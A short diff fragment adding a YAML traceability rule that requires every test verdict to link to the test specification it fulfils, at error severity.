+    severity: error
+
+  - name: verdict-fulfils-spec
+    description: Every test verdict must fulfil a test specification
+    source-type: test-verdict
+    required-link: fulfils
+    target-types: [test-spec]
+    severity: error